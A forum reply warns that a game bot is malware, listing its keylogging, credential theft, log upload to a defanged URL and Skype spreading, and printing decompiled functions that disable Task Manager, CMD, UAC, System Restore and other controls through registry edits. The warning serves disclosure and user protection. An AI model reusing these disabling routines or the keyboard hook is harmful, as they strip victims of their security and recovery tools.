Originally Posted by
username1001011
Did you even read the article? What do packed system files have to do with this?
When I say it's a keylogger etc., I'm not making an assumption based on the VT output. I looked at the code and saw it.
Here is a very inconclusive list of nasty stuff this program does:
- Keylogger using a keyboard hook, in PoEEX Bot::KeyHook::Hook(): KeyHook.KHK = KeyHook.SetWindowsHookEx(WH_KEYBOARD_LL, KeyHook.KHD, (int)value, 0);
- Uploads logs to hxxp://www.limitlessproducts.org/Limitless/Login/submit_log.php as user=wedge92 in PoEXX Bot::mainFunctions::dispatchConfirmation()
- Takes screenshots of your computer and E-Mails them, PoEXX Bot::mainFunctions::Email()
- Forces you to login to your Steam account
- Forces you to login to Skype, sends Skype messages
- Visit websites
- Downloads and executes further stuff, possibly on command, didn't check
- Gets your Firefox, Chrome, Filezilla, Spotify, MSN, Pidgin, SmartFTP, DynDNS, CoreFTP, ... passwords if they are saved on your computer (recovery settings etc)
- Spreads itself over Skype
- Uses the ClassLibrary1 module (the embedded DLL) to do a lot more nasty stuff like disabling your TaskMgr, CMD, etc:
Code:
// ClassLibrary1.Functions.Other.Disables
public static void ControlPanel()
{
try
{
Interaction.Shell("REG add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f", AppWinStyle.Hide, false, -1);
}
catch (Exception arg_12_0)
{
ProjectData.SetProjectError(arg_12_0);
ProjectData.ClearProjectError();
}
}
// ClassLibrary1.Functions.Other.Disables
public static void FolderOptions()
{
try
{
Interaction.Shell("REG add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f", AppWinStyle.Hide, false, -1);
}
catch (Exception arg_12_0)
{
ProjectData.SetProjectError(arg_12_0);
ProjectData.ClearProjectError();
}
}
// ClassLibrary1.Functions.Other.Disables
public static void Registry()
{
try
{
MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "DisableRegistryTools", "1", RegistryValueKind.DWord);
}
catch (Exception arg_24_0)
{
ProjectData.SetProjectError(arg_24_0);
ProjectData.ClearProjectError();
}
}
// ClassLibrary1.Functions.Other.Disables
public static void SystemRestore()
{
try
{
MyProject.Computer.Registry.SetValue("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore", "DisableSR", "1", RegistryValueKind.DWord);
}
catch (Exception arg_24_0)
{
ProjectData.SetProjectError(arg_24_0);
ProjectData.ClearProjectError();
}
}
// ClassLibrary1.Functions.Other.Disables
public static void TaskManager()
{
try
{
MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "DisableTaskMgr", "1", RegistryValueKind.DWord);
}
catch (Exception arg_24_0)
{
ProjectData.SetProjectError(arg_24_0);
ProjectData.ClearProjectError();
}
}
// ClassLibrary1.Functions.Other.Disables
public static void Uac()
{
try
{
Interaction.Shell("C:\\Windows\\System32\\cmd.exe /k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f", AppWinStyle.Hide, false, -1);
}
catch (Exception arg_12_0)
{
ProjectData.SetProjectError(arg_12_0);
ProjectData.ClearProjectError();
}
}
// ClassLibrary1.Functions.Other.Disables
public static void Cmd()
{
try
{
MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System", "DisableCMD", "1", RegistryValueKind.DWord);
}
catch (Exception arg_24_0)
{
ProjectData.SetProjectError(arg_24_0);
ProjectData.ClearProjectError();
}
}
I find it great that people don't blindly believe stuff, but really? It's not that hard to look at it yourself, and linking articles that you either didn't read or/nor understand does not help anyone.